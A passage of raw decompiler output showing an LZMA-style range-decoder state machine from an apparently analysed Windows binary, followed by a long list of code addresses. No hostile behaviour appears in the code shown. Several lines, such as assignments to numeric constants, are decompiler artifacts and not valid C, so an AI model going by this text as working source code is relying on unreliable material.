												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ffe
                                                                                                                                                                                                                            0x00406ffe
                                                                                                                                                                                                                            0x00407002
                                                                                                                                                                                                                            0x00407023
                                                                                                                                                                                                                            0x0040702a
                                                                                                                                                                                                                            0x00407030
                                                                                                                                                                                                                            0x00407036
                                                                                                                                                                                                                            0x00407048
                                                                                                                                                                                                                            0x0040704e
                                                                                                                                                                                                                            0x00407053
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407004
                                                                                                                                                                                                                            0x0040700a
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040741c
                                                                                                                                                                                                                            0x00407420
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x004075fd
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x0040742c
                                                                                                                                                                                                                            0x00407433
                                                                                                                                                                                                                            0x0040743b
                                                                                                                                                                                                                            0x0040743e
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406be3
                                                                                                                                                                                                                            0x00406bec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bfd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c06
                                                                                                                                                                                                                            0x00406c09
                                                                                                                                                                                                                            0x00406c0c
                                                                                                                                                                                                                            0x00406c10
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c16
                                                                                                                                                                                                                            0x00406c19
                                                                                                                                                                                                                            0x00406c1b
                                                                                                                                                                                                                            0x00406c1c
                                                                                                                                                                                                                            0x00406c1f
                                                                                                                                                                                                                            0x00406c21
                                                                                                                                                                                                                            0x00406c22
                                                                                                                                                                                                                            0x00406c24
                                                                                                                                                                                                                            0x00406c27
                                                                                                                                                                                                                            0x00406c2c
                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
                                                                                                                                                                                                                            0x00406c5c
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c86
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
